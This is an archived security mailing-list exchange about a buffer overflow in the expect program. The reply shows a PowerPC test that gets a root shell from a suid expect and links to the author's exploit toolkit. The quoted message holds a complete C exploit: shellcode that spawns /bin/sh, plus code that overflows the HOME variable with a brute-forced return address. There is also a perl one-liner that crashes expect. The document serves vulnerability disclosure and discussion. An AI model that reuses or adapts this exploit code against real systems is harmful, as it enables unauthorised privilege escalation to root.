Kevin, Here's the PPC shellcode info you asked for: This is mainly a post of my PowerPC exploit efforts... anyways... Just for grins I tested a scenario under Debian PowerPC GNU/Linux with: ii expect5.31 5.31.8-3 A program that "talks" to other programs. [-(core@euclid:~/sploits/shellcode/reet)> sudo chmod 4755 /usr/bin/expect [-(core@euclid:~/sploits/shellcode/reet)> ls -lL /usr/bin/expect -rwsr-xr-x 1 root root 4328 Sep 20 2000 /usr/bin/expect [-(core@euclid:~/sploits/shellcode/reet)> ./eggshell 512 [ Buffer size: 512 Egg size: 2048 Aligment: 0] [ Address: 0x100111f8 Offset: 0 ] sh-2.05$ id uid=1000(core) gid=1000(core) groups=1000(core),4(adm),24(cdrom),29(audio) sh-2.05$ /usr/bin/expect expect1.1> id uid=1000(core) gid=1000(core) euid=0(root) groups=1000(core),4(adm),24(cdrom),29(audio) expect1.2> If you find a program that calls expect suid let me know ;-) Best Regards, Charles Stevenson P.S. the "reet" tools I wrote to add PowerPC support are based on Aleph One's smashstack code. It's available at: http://www.ezlink.com/~core/files/reet.tar.gz (Comments welcome:) > I have found an overflow in and coded the exploit code for several > versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am > unable to think of a situation where this would be useful due to the > fact that expect is not suid...can anyone help me determine if this is > exploitable to obtain root? Perhaps a suid expect script could be > exploited? or maybe something like suid kppp which calls expect as a > helper program? > > [root@linux elguapo]# export HOME=`perl -e 'print "A" x 433'` > [root@linux elguapo]# expect > Segmentation fault (core dumped) > > -Kevin Finisterre > dotslashat_private > --------------54785D81E19EEAA4D65A5A40 > Content-Transfer-Encoding: 7bit > Content-Type: text/plain; charset=us-ascii; > name="expect.c" > Content-Disposition: inline; > filename="expect.c" > > //krfinisterreat_private or dotslashat_private > //this is output from my brute script... > //722 > //Stack pointer: 0xbffffa18 > // Offset: 0x2d3 > // Return addr: 0xbffff745 > //stack/brute.sh: line 11: 2190 Illegal instruction (core dumped) > $3 > $L > //723 > //Stack pointer: 0xbffffa18 > // Offset: 0x2d4 > // Return addr: 0xbffff744 > //sh-2.04# > //note that I was root when I ran this ... expect is not suid > > #define BUFFERSIZE 533 > > unsigned long sp(void) > { > __asm__("movl %esp, %eax"); > } > > int main(int argc,char **argv) > { > char hell[] = > "\x29\xc0" > "\x29\xc0" > "\xb0\x47" > "\x29\xdb" > "\xb3\x0c" > "\x89\xd9" > "\xcd\x80" > "\x5e" > "\x29\xc0" > "\x88\x46\x07" > "\x89\x46\x0c" > "\x89\x76\x08" > "\xb0\x0b" > "\x87\xf3" > "\x8d\x4b\x08" > "\x8d\x53\x0c" > "\xcd\x80" > "\xe8\xe3\xff\xff\xff" > "\x2f\x62\x69\x6e\x2f\x73\x68"; > int i; > int offset; > long esp; > long ret; > long *addr_ptr; > char *buffer, *ptr; > offset = atoi(argv[1]); > esp = sp(); > ret = esp-offset; > > if(!(buffer = malloc(BUFFERSIZE))) > { > printf("oops\n"); > exit(-1); > } > > ptr = buffer; > addr_ptr = (long *)ptr; > for (i=0; i<BUFFERSIZE; i+=4) > *(addr_ptr++) = ret; > > for (i=0; i<BUFFERSIZE/2; i++) > buffer[i] = '\xeb02'; > > ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2)); > for(i=0; i<strlen(hell); i++) > *(ptr++) = hell[i]; > > buffer[BUFFERSIZE-1] = 0; > > setenv("HOME", buffer, 1); > execlp("/usr/bin/expect", 0); > } > > --------------54785D81E19EEAA4D65A5A40--
This archive was generated by hypermail 2b30 : Thu Jun 07 2001 - 22:03:18 PDT